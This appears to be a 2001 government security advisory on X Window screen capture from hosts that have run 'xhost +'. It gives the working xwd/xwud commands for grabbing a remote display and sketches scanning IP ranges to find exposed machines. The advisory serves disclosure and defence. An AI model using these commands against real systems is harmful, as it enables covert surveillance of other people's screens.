During recent validation efforts of a UNIX vulnerability, it was discovered that a computer running Xwindows in the UNIX environment, and having xhost+ invoked, could capture a screen of any other UNIX system running xhost.

Xwindows is a standard UNIX interconnectivity package included with all UNIX operating system software. The Xwindows server is started from a terminal window with the command xdm. This utility is run from the system boot files and takes care of keeping the server running, prompting for user names and passwords, and starting up the user sessions. It is easily configured for sites that wish to provide consistent interfaces for novice users. As a support file, xhost+ (+ enables access to everyone) allows the set up and maintenance of the users who have access to system resources for sharing files or running programs remotely. Once Xwindows is running, two or more computers are interactively connected allowing each user to operate the others computer.

Although Xserver has been determined as a potential security exploit, a new problem has surfaced. As the primary user (root) running xhost+, it is possible to capture the screen image of any other computer system running xhost+ (root or otherwise). The captured image is of the target systems screen, at the given moment of the capture. To initiate a screen capture, in the xterm window, enter:

xwd -root -display xxx.xxx.xxx.xxx:0.0 > filename,

where xxx.xxx.xxx.xxx is the Internet Protocol (IP) address of the UNIX machine to be attacked. The attack in this case, is to capture the targeted machine's screen. The filename is the file where the screen capture will be saved on the attackers computer. To display the captured image enter:

xwud -in filename.

The Xwindows screen capture feature is not a software bug, but built into Xwindow for system administration and information sharing. As part of the validation, xhost+ was launched from a UNIX system and successfully captured a screen from another UNIX system as a trusted host. Then an identical attack was mounted from a different UNIX system as an anonymous host, successfully capturing the remote screen again. This attack has the potential to be conducted through a firewall, however no future analysis has been initiate at this time. The exploitation of this xhost+ feature is undetectable and can be run at any time.

Anyone running xhost+ who has a valid IP of another user running xhost+ can capture their screen image. Using a simple script and the domain of an IP address, an individual can increment through multiple IP addresses, and determine which computers are running xhost+. An attacker can then setup a script to screen capture at given intervals throughout the day and save the images for review. This vulnerability is undetectable and can be run at any time.

That this information be coordinated with the CIAC, and that an assessment be conducted to determine the extent of the potential threat posed to the DOE Information Assurance Infrastructure.

Security and Privacy Notice
To contact send email to ISRC
Last Updated October 2001